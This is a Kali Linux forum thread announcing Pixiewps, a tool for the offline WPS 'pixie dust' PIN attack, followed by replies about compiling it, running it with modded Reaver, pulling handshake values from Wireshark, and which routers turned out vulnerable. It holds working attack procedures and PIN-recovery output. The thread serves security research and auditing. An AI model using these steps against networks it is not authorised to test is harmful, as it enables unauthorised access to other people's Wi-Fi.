PDA

View Full Version : Pixiewps: wps pixie dust attack tool



wiire
2015-04-03, 10:44
We started a new thread for collecting data: https://forums.kali.org/showthread.php?38127-Data-gathering-for-pixiewps-(pixie-dust-attack)&p=75368&viewfull=1#post75368

Pixiewps is a tool written in C used to bruteforce offline the WPS pin exploiting the low or non-existing entropy of some Access Points, the so-called "pixie dust attack" discovered by Dominique Bongard in summer 2014. It is meant for educational purposes only.

As opposed to the traditional online bruteforce attack, implemented in tools like Reaver or Bully which aim to recover the pin in a few hours, this method can get the pin in only a matter of milliseconds to minutes, depending on the target, if vulnerable.

Recovering PIN:
https://i.imgur.com/tPKgbpB.png

Recovering WPA-PSK (experimental):
https://i.imgur.com/2krBm2Q.png

Brief description: Offline WPS bruteforce utility
Repository: GitHub (https://github.com/wiire/pixiewps)
License: GNU GPLv3+ (http://www.gnu.org/licenses/gpl-3.0.en.html)
Latest release: v1.3.x

To work properly it requires a modified version of Reaver or Bully (neither versions are maintained by me):
Modded Reaver mantained by rofl0r and included in Kali: GitHub (https://github.com/t6x/reaver-wps-fork-t6x) (active development)
Modded Bully by aanarchyy: GitHub (https://github.com/aanarchyy/bully) (stale)

A non-exhaustive list of vulnerable devices (not maintained by me): here (https://docs.google.com/spreadsheets/d/1tSlbqVQ59kGn8hgmwcPTHUECQ3o9YhXR91A_p7Nnj5Y/edit?pref=2&pli=1#gid=2048815923)

Thread where it all started: WPS Pixie Dust Attack (Offline WPS Attack)

References:

Video presentation (http://video.adm.ntnu.no/pres/549931214e18d)
Slide presentation (http://archive.hack.lu/2014/Hacklu2014_offline_bruteforce_attack_on_wps.pdf)

FurqanHanif
2015-04-03, 11:07
Only One Question. is this work with Broadcom Chipset Too or still it only works with ralink Chipset Only ?? :confused:

soxrok2212
2015-04-03, 11:35
Ralink and some broadcom, not all

FurqanHanif
2015-04-03, 11:53
Problem .....
Modified Reaver Not Showing Publick Key (pke).. :confused:


Trying pin 00005678.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
> N1 Enrollee Nonce: f8:49:5a:df:00:b7:0b:9b:6c:cc:64:2d:11:c8:89:52
[+] Received M1 message
> AuthKey: ce:cc:a5:98:fb:a8:5c:c7:7b:5f:1a:a2:be:ca:1b:b5:40 :27:72:a3:3e:d7:4b:db:dd:78:bf:3c:02:bc:51:aa
[+] Sending M2 message
> E-Hash1: 75:26:1a:d3:bd:73:ed:8e:3e:15:3b:aa:33:b0:dd:92:03 :0b:93:7e:93:cb:c0:ec:34:64:9b:06:ea:61:71:8b
> E-Hash2: 01:d6:8f:f1:9d:3d:da:52:3c:45:42:2f:5f:55:f2:3a:0c :00:3f:f2:ae:bf:9c:7b:12:6e:ee:56:89:2c:52:d3
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 2
[+] Pin count advanced: 2. Max pin attempts: 11000
[+] Trying pin 01235678.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
> N1 Enrollee Nonce: 27:2b:38:0d:fc:3a:17:06:d4:7d:d3:09:4d:86:87:95
[+] Received M1 message
> AuthKey: 51:29:84:ca:f5:96:d2:b8:f3:90:9f:81:1f:3e:48:57:2e :5c:b1:81:13:83:84:66:86:82:d3:5b:1b:9b:75:ab
[+] Sending M2 message
> E-Hash1: 87:0f:45:30:2f:61:61:53:88:cb:b6:23:e9:ea:d5:22:9a :c4:c3:62:ff:2a:02:b7:99:a1:9d:99:d9:45:f7:82
> E-Hash2: f9:51:2a:a4:3f:79:e7:67:28:f7:37:f4:31:a7:17:ca:75 :e8:b8:3b:31:25:4a:13:60:c5:82:f5:ef:a7:cc:8f
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 3

wn722
2015-04-03, 13:00
@ FurqanHanif
you can get it out M1,M2 messages in wireshark.
there's also tshark.sh script that can grab it for you. I forgot where I got it, I think it was part of wpsoffline tool download.
but make sure it's all part of one conversation (pin attempt). I just make the reaver to test one pin at a time and capture.

soxrok2212
2015-04-03, 13:02
Did you install the new reaver? Check out the YouTube video. You don't need wire shark at all.

FurqanHanif
2015-04-03, 13:29
@soxrok2212 i already Mentioned that it's Modified Reaver.. and i also i downloaded it from You Tube Link. i Tried this on Five Routers but it don't giving me Same Output For All (No PKE ) ...
@wn722 Which one is Pke exactly from This ??

M1 wps.enrollee_nonce : e1123ae1a03001165f243ba7a2a19475
M2 wps.enrollee_nonce : e1123ae1a03001165f243ba7a2a19475
M2 wps.registrar_nonce : 5180afc40d4ca3e31d25affd14e78d1e
M2 wps.authenticator : 72da6b2102198192
M3 wps.registrar_nonce : 5180afc40d4ca3e31d25affd14e78d1e
M3 wps.authenticator : 80c4d98ffd706201
M3 wps.e_hash1 : 6e2cc52a5a22c84e19f701dc8153eb805fc0b247e06178ec3b 01b7b8202ab69a
M3 wps.e_hash2 : 51f0f1b6c9b828345094b535a3c1e120bad0c94f03bc5790b9 de5ae40037224d
M4 wps.enrollee_nonce : e1123ae1a03001165f243ba7a2a19475
M4 wps.authenticator : 8824706540ab0f4d
M4 wps.encrypted_settings : 20bfe3939b2872273204fc93dd52d4ec25b68a23e596630712 b3404cdb1eb125fb3f4e96a8db05a754d5eeb98940728ea243 e8925b0d968fac70fc5bf71b8a36
M4 wps.r_hash1 : b1eea2314f81f2e3d40afbe5af5c19b61bcb7f955d57f61630 6a696da347f0e5
M4 wps.r_hash2 : eaf1b41b28edb43b6feeafdad792500a34482ec1b2b6ad8e97 4288230648e38c

soxrok2212
2015-04-03, 14:30
Did you move reaver to bin after you compiled?

kcdtv
2015-04-03, 14:45
Before trying the tool i really want to say to you " thank you so much wiire!"
For all your great work and above all all your explanations all the way long (and for releasing a GPL v3 code)


- to work on a modified version of Reaver/Bully
:D We can see that it comes form the heart and that it must have been a "pain in th-censurde-ss" at some points.

Thank you so much wiire! :)

FurqanHanif
2015-04-03, 14:57
Did you move reaver to bin after you compiled?

./configure
make
make install


i think it overwrite the existing Reaver ( because existing reaver not showing the enrolle/E-HASH stuff but installing modified reaver showing enrolle/E-Hash stuff but not showing PKE).. :/ So i think their is no need to copy reaver in Bin.. :confused:

wiire
2015-04-03, 15:30
./configure
make
make install


i think it overwrite the existing Reaver ( because existing reaver not showing the enrolle/E-HASH stuff but installing modified reaver showing enrolle/E-Hash stuff but not showing PKE).. :/ So i think their is no need to copy reaver in Bin.. :confused:

See if it compiles and creates the executable. Then try to run it from that folder (no make install).

chmod +x configure
./configure
make distclean && ./configure
make
./reaver -i mon0 etc.

scorpius
2015-04-03, 15:58
Minor issue: It doesn't compile under Ubuntu's gcc 4.8.2 unless I edit the makefile as follows:
$(CC) pixiewps.c $(CCFLAGS) -o $(TARGET)

FurqanHanif
2015-04-03, 17:07
Same Output Getting... :confused:

rollex78
2015-04-03, 17:21
Did you install the new reaver? Check out the YouTube video. You don't need wire shark at all.please if u can reupload links for download...youtube link is deleted

f1ber
2015-04-03, 17:31
Can you go into some detail as there is a lot of censored information in the OP? Does this run similar to reaver? Does this automate the extraction of the required information from wireshark? Maybe a usage example would be helpful, as I did not see one.

ie: pixiewps -b <bssid> or similar...

Amazing work, nonetheless!

soxrok2212
2015-04-03, 18:06
It's really not that hard to install. We told you exactly what to do. If you can't copy the executable reaver to bin, you shouldn't be using Linux.

FurqanHanif
2015-04-03, 18:45
i Copy that Reaver file to bin Getting Same Output , Started reaver from That Compiled Directory still Getting Same Output , tried tshark it also not Showing Public key like thing. Now What ??

ravendrow
2015-04-03, 20:18
hey just wanted to say thanks again for releasing this seems to work pretty good for me...one thing i noticed is on some routers the model# shows up as 123456 kinda curious as to why that is...also i just noticed the vid soxrok2212 put up last night has been taken down was that ya'll or youtube?

kcdtv
2015-04-03, 22:36
It works perfectly.
Just that I didn't updated my kali for a while and i tryed to install it without updating first and I got a fail.
After updating i could compile and install pixiewps.c
before updating i installed
libsqlite3-dev, I don't know if it was usefull.
cheers & thanks

aanarchyy
2015-04-03, 23:52
Quick question, do you have to specify small dh in reaver to use the S flag in pixiewps?

kcdtv
2015-04-03, 23:58
Quick answer
I don't know if it is necessary but i did like this and it worked
That's actually a question that i had in mind too :D

aanarchyy
2015-04-04, 00:03
Quick answer
I don't know if it is necessary but i did like this and it worked
That's actually a question that i had in mind too :D
Hah! That was quick! I'll see if I can test this later on. Awesome work wiire, so far this seems to work great.

soxrok2212
2015-04-04, 01:12
Yes. Then you don't need to dig for the PKR in wireshark

mmusket33
2015-04-04, 12:25
Since the help vid is down MTeams provides the following:

This assumes you have a working reaver modded for pixie-dust
This assumes you can run reaver and wash
This will only show you how to quickly find the five(5) variables required.

The modified reaver obtains three(3) of the five(5) variables. The only other problem is finding the corresponding or paired --pke and --pkr in wireshark.

After you have put your wifi device in monitor mode.

1. Start wireshark
2. Select Capture
3. Select Interface and choose your capture interfaces.
4. Start the capture
5. Click capture filters
6. Type or/select wps.public_key[Enter]

When you hit enter the wireshark screen may go blank as it filters the output.

7. Start reaver
8. As reaver obtains M1 and M2 data only these lines will appear in wireshark.
9. When you have collected enough data stop reaver and wireshark.
10. Copy your reaver output from the terminal window and save it to a text file. You will need it latter.

The N1 Enrollee Nonce links the output in reaver to the correct M1 and M2 packets in wireshark.

11. Go to wireshark, Click on the top screen showing No. Time Source......Info WPS M1

The --pke is located in the WPS M1 packets.


12 Select Ctrl-f. A drop down menu will appear = Wireshark Find Packet

Select String

Select Packet Details

In the Filter Block type public key then select find


13 Your cursor should now be over Public Key in the middle wireshark window and you should be in a WPS M1 packet(top screen info),

14. Scroll up in the middle wireshark block and find the Enrollee Nonce Go to your reaver text file you saved and find the same N1 Enrollee Nonce. If it is followed by a:

1. Authkey
2. E-Hash1
3. E-Hash2

You can use this packet in wireshark.

15 Scroll down in the same middle block in wireshark and find Public Key: hex string

16 Click on the Pubic key, then right click, select copy, follow the > to the right, select value. The --pke value is now on the clipboard. Copy it to a text file.

17 Go to wireshark, click on the top screen showing No. Time Source......Info WPS M2

18 Again make sure the Enrollee Nonce is the same and copy the Public Key from the M2 packet. Do not confuse the Registrar Nonce with the Enrollee Nonce in the M2 packet. You now have the paired --pkr hex string.


As long as the enrollee nonce is the same in both reaver output and wireshark M1 and M2 you have picked the right packets in wireshark.

Put the five(5) variables in your pixie dust program and try your luck.

Currently we type in leafpad the following at the bottom of our reaver output file we made in item 10 above and then just paste in the hex strings. When completed we paste the entire text string into a terminal window and type [Enter]

pixiewps --e-nonce --pke --pkr --authkey --e-hash1 --e-hash 2

After a few runs you can do this is less then three(3) minutes.,

soxrok2212
2015-04-04, 12:49
Video is back up in full HD :D just search "WPS Pixie Dust" on youtube and you'll find it.

f1ber
2015-04-04, 14:03
Video is back up in full HD :D just search "WPS Pixie Dust" on youtube and you'll find it.

Awesome work soxrok2212! I have been playing with this for some time now, unfortunately I only have BCM* based chipsets available for testing, and have had 0% success. Models range from D-Link DSL2 series, Netgear WDNR series, and Linksys E series. Very awesome work just the same though, and a whole new era for WPS auditing. Let me know if you would like any of the results I have capture for analysis.

My command for all tests was:

#~: pixiewps -e <pke> -s <ehash-1> -z <ehash-2> -a <auth-key> -S -n <e-nonce>

wiire
2015-04-04, 14:16
@mmusket33, FurqanHanif
I don't know which version of the modded Reaver you are using. The description of the youtube video contains the latest (download (http://www.mediafire.com/download/vig14uwb8a9wi0a/reaver-wps-fork-read-only.zip)). It prints all the info needed (see the '[P]' tag) apart PKR which can be gathered in the M2 message (under Public Key), or can be avoided if the -S option is specified in both Reaver and Pixiewps. This option is used only to "ease the burden of a 10 seconds copy and paste work".

While I was still working on the program I made a tutorial on another forum to print some information not all (Authkey, E-Hash1, E-Hash2) with the ' > ' tag at the beginning of every print. So maybe you guys are using the 'old version'?


Changing topic, Bongard tweeted (https://twitter.com/Reversity/status/584062604693401601) my tool. :o

FurqanHanif
2015-04-04, 14:27
in Wireshark Public key in Both M2 Message is
000000000000000............. So is This Normal . Should i continue with This ?? Router Chipset is BroadCom..

kcdtv
2015-04-04, 16:57
Changing topic, Bongard tweeted (https://twitter.com/Reversity/status/584062604693401601) my tool. :o

Very nice ! :) :cool:


if the -S option is specified in both Reaver and Pixiewps
That's answers the previous question of aanarchyy and that i was not so sure about :p

wiire
2015-04-04, 17:53
in Wireshark Public key in Both M2 Message is . So is This Normal . Should i continue with This ?? Router Chipset is BroadCom..

You get PKR = 00:00 ... 00:02 when using the '-S' ('--dh-small') option on Reaver. You can use the same option on Pixiewps so you don't need to specify the PKR.

@kcdtv
Fixed the dependency issue. Should compile fine now on Ubuntu and derivatives.

mugiwara303
2015-04-04, 17:58
thank you for making this tool, it's not working on Technicolor APs i hope it will, because in my country (Morocco) 75% of the APs are Technicolor LoL!

Calamita
2015-04-04, 20:49
Nice work wiire and all involved !

Will be sure to test this and gather some information on UK ISP based routers. I have a few lying around I can test

kcdtv
2015-04-04, 21:10
@kcdtv
Fixed the dependency issue. Should compile fine now on Ubuntu and derivatives.
Sweet! I can confirm you that a friend had the same issue yesterday with ubuntu and that the modification solved the issue. In the name of canonial addicted (no one is perfect) thanks!
as i was using reaver_mod and pixiewps.c i was wondering about this two options in the reaver mod and how to "play " with them "smartly" with pxiewps.

-1, --p1-index Set initial array index for the first half of the pin [False]
-2, --p2-index Set initial array index for the second half of the pin [False]

So if i understand well we could use them to try with pixiewps different seeds values then the one predefined for ralink and brodacom.
Could you tel us know a bit more about this?
Other thing that i was curious about. If i get in two different sessions the same nounce repeated, wouldn't it mean taht the entropy is very low also on this particular AP?
cheers

Quest
2015-04-04, 22:54
what is this, no stars for this topic yet? Geeeeeeeeez

Calamita
2015-04-04, 22:57
Tested with UK Sky router Sagecom SR101 - WPS pin not found!

I have a feeling this is a Broadcom chip, however I can't find any more information on this. If anyone does, information would be appreciated :)

Off to find some more to test!

wn722
2015-04-05, 01:24
@Calamita
use the pcap file and run it through tshark.sh script = that'll extract the HW info.
or go to fccid tool and use FCC ID number, it's usually on the sticker
http://fccid.net/

bandeapart
2015-04-06, 01:34
This worked so well for me...WOW. So WPS has been broken completely.

I did a couple of captures, and noticed in WireShark that when you have a successful attempt, the relevant part of the M2 packet will be marked with light blue. I think that's what it was, anyway... I was thinking it signified a successful capture of what it needed, as it listed an ",,,R,F,C" on the good one, and only an ",,,F,C" on the fails.

It took 0 seconds to crack, by the way. You're brilliant.

slmafiq
2015-04-06, 14:23
Hi all!
Can u help me pls
Where is the problem? Thanks!

screenshot
http://www36.zippyshare.com/v/WF6nh9cU/file.html

nuroo
2015-04-06, 17:31
Where can I find a link to tshark.sh?

wiire
2015-04-06, 17:39
as i was using reaver_mod and pixiewps.c i was wondering about this two options in the reaver mod and how to "play " with them "smartly" with pxiewps.

-1, --p1-index Set initial array index for the first half of the pin [False]
-2, --p2-index Set initial array index for the second half of the pin [False]

So if i understand well we could use them to try with pixiewps different seeds values then the one predefined for ralink and brodacom.

I don't undertand what you're trying to say here. Ralink doesn't have a seed. It doesn't use a pseudo-random number for ES-1 and ES-2. It uses a constant (ES-1 = ES-2 = 0).

Broadcom has a pseudo-number generator. Its seed (for ES-1 and ES-2) can be bruteforced using the nonce as a reference: when using a certain number (initial seed) we get the same sequence of the nonce we know that we can find the ES-1 and ES-2 sequences because they're calculated right after the nonce.

The PIN is provided by the Registrar (the attacker) on M4 and it's not relevant (for the pixie dust attack purposes). Quoting Bongard: the right PIN is provided by the Enrollee (AP) with M3 in two "Safes". The first one contains the first half of the PIN and it's lock combination is ES-1. The second one contains the second half of the PIN and it's lock combination is ES-2. The attack consists in bruteforcing the seed of the Broadcom's PRNG to get the two combinations (ES-1 and ES-2).


Other thing that i was curious about. If i get in two different sessions the same nounce repeated, wouldn't it mean taht the entropy is very low also on this particular AP?

If you look on page 55 on Bongard's slides.
- "do not generate new random enrollee nonce in case of we have prebuild enrollee nonce"
- "It should not generate new key pair if we have prebuild enrollee nonce"

So on some implementations the nonce and the the keys don't change in different sessions. This is not about entropy, it's about vendor/manufacturer's implementations.

Desuu
2015-04-06, 18:20
Hello! I want to know whether this attack is limited to the known vulnerable chipsets, or if it can be used on more routers if more research is done ?

nuroo
2015-04-06, 23:32
This attack worked on Arris models TG1672 and DG1670.
Modified reaver spits out info needed for pixiewps. wps pin in secs.

wiire
2015-04-07, 10:35
Hello! I want to know whether this attack is limited to the known vulnerable chipsets, or if it can be used on more routers if more research is done ?

This attack could be potentially extended to more routers if more research is done. There are some other manufacturers that have not been checked yet (like Marvell, Intel, Qualcomm, Realtek...). Also, good entropy on embedded systems (with limited resources) is always a problem especially at boot.

The devices that are not affected are probably the ones which use hardware random number generators. Also systems running Linux / Hostapd seem secure.

I have nearly zero experience with this kind of stuff, so if you wanna jump in, do it. Anyone can contribute.

Quest
2015-04-08, 00:25
aye congrats wiire!! https://bugs.kali.org/view.php?id=2203 :cool:

casperass
2015-04-08, 09:34
I can't install pixiewps. I get this error when I type "make" in its src directory.

gcc -o pixiewps pixiewps.c -lssl -lcrypto -Wall -Werror
pixiewps.c:33:26: fatal error: openssl/hmac.h: No such file or directory
compilation terminated.
make: * [all] Error 1

kcdtv
2015-04-09, 12:59
did you install the development libraries for openssl?

Cheers

WaLkZ
2015-04-09, 17:00
This attack could be potentially extended to more routers if more research is done. There are some other manufacturers that have not been checked yet (like Marvell, Intel, Qualcomm, Realtek...). Also, good entropy on embedded systems (with limited resources) is always a problem especially at boot.

The devices that are not affected are probably the ones which use hardware random number generators. Also systems running Linux / Hostapd seem secure.

I have nearly zero experience with this kind of stuff, so if you wanna jump in, do it. Anyone can contribute.


Is there any chance this to work on TP-LINK in the future ?

TP-LINK like this http://www.maytinhviettrung.com/1_html/img/product_img/thum/1392548919_TP-Link-150Mbits-Wireless-TL-WR740ND.jpg

soxrok2212
2015-04-09, 19:28
Is there any chance this to work on TP-LINK in the future ?

TP-LINK like this http://www.maytinhviettrung.com/1_html/img/product_img/thum/1392548919_TP-Link-150Mbits-Wireless-TL-WR740ND.jpg

I doubt it... As far as I remeber, TL-WR740n uses an Atheros chipset-- Runs Linux-- not feasible with the PRNG keyspace

kcdtv
2015-04-10, 11:02
tp-link is atheros addict but 4 models of TP-Link AP have at least one version with ralink chipset and this ones may probably be affected.(one was reported as but we never got the datas :p )
this are the models that are suspects :

TP-LINK TD-W8901N v1 TE7TDW8901NV1 bgn RT63365E 2 MiB 8 MiB RT5390

TP-LINK TD-W8951ND v5 TE7TDW8951NDV5 bgn RT63365E 2 MiB 8 MiB RT5390R

TP-LINK TD-W8961NB v3.0 bgn RT63365E 2 MiB 8 MiB

TP-LINK TD-W8961ND v3.x TE7TDW8961NDV3 bgn RT63365E 64 MiB

TP-LINK TD-W8968 v2 TE7TDW8968V2 bgn RT63365E 8 MiB 64 MiB

t6_x
2015-04-10, 16:22
I doubt it... As far as I remeber, TL-WR740n uses an Atheros chipset-- Runs Linux-- not feasible with the PRNG keyspace

Finally able to create my account in this forum

I already emailed the wiire on the tests I've done.

First of all I made a modified version of reaver to facilitate the tests, this modification is already do a pixie test when a pin is tested on reaver

[P] E-Nonce: 41: f2: 8c: 82: 53: 3b: df: ........
[P] PKE: 6b: 0e: 22: cb: cd: 21: ........
[P] WPS Manufacturer: Ralink Technology, Corp.
[P] WPS Model Number: RT2860
[+] Received message M1
[P] AuthKey: f7: fb: bc: 21: ab: 3b: 99: 70: 36: 8e: f1: a0: ........
[+] Sending message M2
[P] E-Hash1: 1e: d6: 12: 27: 8f: 12: 28: 21: 9a: 54: .........
[P] E-Hash2: d: f: 34: and: ac: 55: a4: 9e: b3: 95: 31: 7a: 61: b0: ........
[Pixie-Dust]
[Pixie-Dust] ES-1: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00
[Pixie-Dust] ES-2: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00
[Pixie Dust-] PSK1: 76: 46: 96: c7: 5d: e4: 8a: 86: .......
[Pixie-Dust] PSK2: 1b: 5e: 3e: 6b: 19: 89: 4b: 5c: .......
[Pixie-Dust] [+] WPS pin: 41368541
[Pixie-Dust]
[Pixie-Dust] Time taken: 0 s
[Pixie-Dust]
[+] Received message M3
[+] Sending message M4

If someone want this version, tell me



Now with relation to the TP-Link.

I believe it may be vulnerable to another type of problem.

I have a TP-Link 740N v1, is a very old router, think it 2004-2005


It has the Atheros chipset, Linux runs and uses the hostap together with the / dev / random.

But this firmware version for example has a problem in the generation of random numbers, it may be that this firmware version is with this problem.

The seed for generating the random number is based on the date (date, time, seconds) router

Every time I restart the modem, the seed to generate the random number is the same. So it is possible to make bruteforce on all dates, hours, seconds to find the current state of the seed. This makes it possible to generate future seeds to make bruteforce the pin.


It may be that this problem is only in this firmware version, do not have other routers to test or compare and without having them in the hands is difficult to make the tests.

But this problem certainly is present in many other models of routers.


Today I met a router where the E-Hash1 and the E-Hash2 was identical and there needed to make a modification in pixie for him to do the bruteforce correctly.

I will continue to develop and when I have more news come back to post.

Sorry for the English, I used a translator

DeepCopy
2015-04-10, 19:57
I'm interested in your modified reaver version. Does it also test the pin to get the actual paraphrase as well?


Finally able to create my account in this forum

I already emailed the wiire on the tests I've done.

First of all I made a modified version of reaver to facilitate the tests, this modification is already do a pixie test when a pin is tested on reaver

[P] E-Nonce: 41: f2: 8c: 82: 53: 3b: df: ........
[P] PKE: 6b: 0e: 22: cb: cd: 21: ........
[P] WPS Manufacturer: Ralink Technology, Corp.
[P] WPS Model Number: RT2860
[+] Received message M1
[P] AuthKey: f7: fb: bc: 21: ab: 3b: 99: 70: 36: 8e: f1: a0: ........
[+] Sending message M2
[P] E-Hash1: 1e: d6: 12: 27: 8f: 12: 28: 21: 9a: 54: .........
[P] E-Hash2: d: f: 34: and: ac: 55: a4: 9e: b3: 95: 31: 7a: 61: b0: ........
[Pixie-Dust]
[Pixie-Dust] ES-1: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00
[Pixie-Dust] ES-2: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00
[Pixie Dust-] PSK1: 76: 46: 96: c7: 5d: e4: 8a: 86: .......
[Pixie-Dust] PSK2: 1b: 5e: 3e: 6b: 19: 89: 4b: 5c: .......
[Pixie-Dust] [+] WPS pin: 41368541
[Pixie-Dust]
[Pixie-Dust] Time taken: 0 s
[Pixie-Dust]
[+] Received message M3
[+] Sending message M4

If someone want this version, tell me



Now with relation to the TP-Link.

I believe it may be vulnerable to another type of problem.

I have a TP-Link 740N v1, is a very old router, think it 2004-2005


It has the Atheros chipset, Linux runs and uses the hostap together with the / dev / random.

But this firmware version for example has a problem in the generation of random numbers, it may be that this firmware version is with this problem.

The seed for generating the random number is based on the date (date, time, seconds) router

Every time I restart the modem, the seed to generate the random number is the same. So it is possible to make bruteforce on all dates, hours, seconds to find the current state of the seed. This makes it possible to generate future seeds to make bruteforce the pin.


It may be that this problem is only in this firmware version, do not have other routers to test or compare and without having them in the hands is difficult to make the tests.

But this problem certainly is present in many other models of routers.


Today I met a router where the E-Hash1 and the E-Hash2 was identical and there needed to make a modification in pixie for him to do the bruteforce correctly.

I will continue to develop and when I have more news come back to post.

Sorry for the English, I used a translator

wiire
2015-04-10, 21:48
Pixiewps 1.0.5 is out!

Added a partial implementation of a new attack! :)

Vulnerable devices: Realtek (ES-1 = ES-2 = Enrollee nonce). This attack doesn't always work. Also be sure not to use --dh-small with this one! Get the PKR from Wireshark and supply the Enrollee Nonce. Test and report!

Thanks to Dominique Bongard (again) and also to soxrok2212.

Bongard tweet: https://twitter.com/Reversity/status/586610963354357762
Rand function to implement: https://github.com/skristiansson/uClibc-or1k/blob/master/libc/stdlib/random_r.c

clone
2015-04-11, 04:38
I do not have a much larger practical interest in this attack vector other than as POC; and probably won't spend a ton of time testing it out or using it. but this is still some really nice work! Kudos :)

t6_x
2015-04-12, 14:47
Here is my contribution

https://forums.kali.org/showthread.php?25123-Reaver-modfication-for-Pixie-Dust-Attack

WaLkZ
2015-04-12, 20:02
Now with relation to the TP-Link.

I believe it may be vulnerable to another type of problem.

I have a TP-Link 740N v1, is a very old router, think it 2004-2005


It has the Atheros chipset, Linux runs and uses the hostap together with the / dev / random.

But this firmware version for example has a problem in the generation of random numbers, it may be that this firmware version is with this problem.

The seed for generating the random number is based on the date (date, time, seconds) router

Every time I restart the modem, the seed to generate the random number is the same. So it is possible to make bruteforce on all dates, hours, seconds to find the current state of the seed. This makes it possible to generate future seeds to make bruteforce the pin.


It may be that this problem is only in this firmware version, do not have other routers to test or compare and without having them in the hands is difficult to make the tests.

But this problem certainly is present in many other models of routers.


Today I met a router where the E-Hash1 and the E-Hash2 was identical and there needed to make a modification in pixie for him to do the bruteforce correctly.

I will continue to develop and when I have more news come back to post.

If you can do this brute-force attack in the fiture to work on tp-link 740n it will be awesome because 95% of networks around me are tp-link 740n with turned on WPS. :)

soxrok2212
2015-04-13, 00:26
Today I met a router where the E-Hash1 and the E-Hash2 was identical and there needed to make a modification in pixie for him to do the bruteforce correctly.


Someone I am working with has also found an AP where E-Hash1 = E-Hash2. I speak a little Spanish and the other guy speaks it fluently... I guess you do too? Anyways, if you could e-mail me that would be great. My e-mail is my user name @gmail.com

Thanks!

slmafiq
2015-04-13, 10:22
If you can do this brute-force attack in the fiture to work on tp-link 740n it will be awesome because 95% of networks around me are tp-link 740n with turned on WPS. :)

i have the same problem!~ :D
http://www44.zippyshare.com/v/aEY5Jq61/file.html

wiire
2015-04-14, 10:47
tp-link is atheros addict but 4 models of TP-Link AP have at least one version with ralink chipset and this ones may probably be affected.(one was reported as but we never got the datas :p )


Vendor: TP-LINK
Model: TD-W8951ND
Firmware: 3.0.1 Build 110720 Rel.40612
Chipset: Ralink (RT2860)

Confirmed vulnerable.

popthattif
2015-04-14, 16:39
I have TP-LINK TD-W8961ND with the same Chipset Ralink (RT2860) but when i tryed Reaver to get the infos it always get stock at M2 is there a solution please

Jynn
2015-04-18, 07:24
Vendor: TP-LINK
Model: TD-W8951ND
Firmware: 3.0.1 Build 110720 Rel.40612
Chipset: Ralink (RT2860)

Confirmed vulnerable.

Have tested the following routers with these results : " WPS pin not found! "

1. WPS Manufacturer: D-Link
WPS Model Number: DIR-615

2. WPS Manufacturer: ASUSTeK Computer Inc.
WPS Model Number: RT-N12

3. WPS Manufacturer: TP-LINK
WPS Model Number: 1.0

WaLkZ
2015-04-19, 14:43
Have tested the following routers with these results : " WPS pin not found! "

1. WPS Manufacturer: D-Link
WPS Model Number: DIR-615

2. WPS Manufacturer: ASUSTeK Computer Inc.
WPS Model Number: RT-N12

3. WPS Manufacturer: TP-LINK
WPS Model Number: 1.0

Also D-Link DIR-501

Frost.Elrick
2015-04-26, 09:42
pixie is not installing.:confused:
it says
gcc -o pixiewps pixiewps.c -lssl -lcrypto -Wall -Werror
pixiewps.c:46:26: fatal error: openssl/hmac.h: No such file or directory
compilation terminated.
make: *** [all] Error 1
even libssl-dev isnt installing. its searching for 1.0.1e-2+deb7u12 but the repository has 1.0.1e-2+deb7u16.
what to do..???:confused::confused::confused:

slim76
2015-04-27, 01:25
pixie is not installing.:confused:
it says
gcc -o pixiewps pixiewps.c -lssl -lcrypto -Wall -Werror
pixiewps.c:46:26: fatal error: openssl/hmac.h: No such file or directory
compilation terminated.
make: *** [all] Error 1
even libssl-dev isnt installing. its searching for 1.0.1e-2+deb7u12 but the repository has 1.0.1e-2+deb7u16.
what to do..???:confused::confused::confused:

Try this command: gcc -o pixiewps pixiewps.c -lssl -lcrypto

mmusket33
2015-04-27, 03:21
The position of the reaver wpc files when using these modded reaver programs is now:

/usr/local/etc/reaver/

Files names are the 12digit mac address(no colons) of the target followed by .wpc

Any unfinished work previously done with the stock version must be copied or moved from the /etc/reaver/ folder to the /usr/local/etc/reaver/ folder. To confirm file position use the following command in the terminal window.

locate "*.wpc"

MTeams

TheMantis
2015-04-27, 12:21
this thing is wicked, thank you so much. it makes wifi testing so much quicker but I'll forget all the commands. oh well, who needs typing when you have script.

the_shadow
2015-04-27, 21:53
with this give me always pin not found!!!

Theres any solution?

Frost.Elrick
2015-04-27, 23:11
Try this command: gcc -o pixiewps pixiewps.c -lssl -lcrypto

it also givees the same error.
libssl-dev isnt installing,may be it is causing the problem but i can not get this evn after apt-get update.:confused:

mmusket33
2015-04-28, 00:44
To: FrostElrick

Try this:

Copy the following data between the #### to a text file with leafpad in root and name the file sources.list

################

#placed in /etc/apt/ folder
deb http://http.kali.org/kali kali main contrib non-free
deb-src http://http.kali.org/kali kali main contrib non-free
deb http://security.kali.org/kali-security kali/updates main contrib non-free
deb-src http://security.kali.org/kali-security kali/updates main contrib non-free
deb http://http.kali.org /kali main contrib non-free
deb http://http.kali.org /wheezy main contrib non-free

################
Go to the /etc/apt folder and rename the existing sources.list file to sources.list.orig

ie sources.list.original

Now copy the sources.list file in root to the etc/apt folder


Get an internet connection open a terminal window and


sudo apt-get install libssl-dev
sudo apt-get install libpcap-dev
sudo apt-get install libsqlite3-dev


Now install your modded reaver and pixiewps


Now go to your /etc/apt folder and erase your sources.list then rename sources.list.orig back to sources.list

Musket Teams

slim76
2015-04-28, 13:19
You could try using FrankenScript to download it and set it up, you can then browse the setup output in the frankenscript window by scrolling back.
If you still get an error then I'd guess your kali installation is broken in some way.

wiire
2015-05-01, 19:33
Pixiewps 1.1 is out! :)

Download: GitHub (https://github.com/wiire)

What's new:
- The previous attack now is fully implemented
- AuthKey computation if --dh-small is specified (also in Reaver). The data can be gathered from a .cap file (manually)
- Better input parsing with parameters length check
- More user friendly. Added some examples of use in the usage screen.

NOTE:
- In this version the computer/machine time you're running pixiewps on is IMPORTANT. Be sure it's set to the right date and time
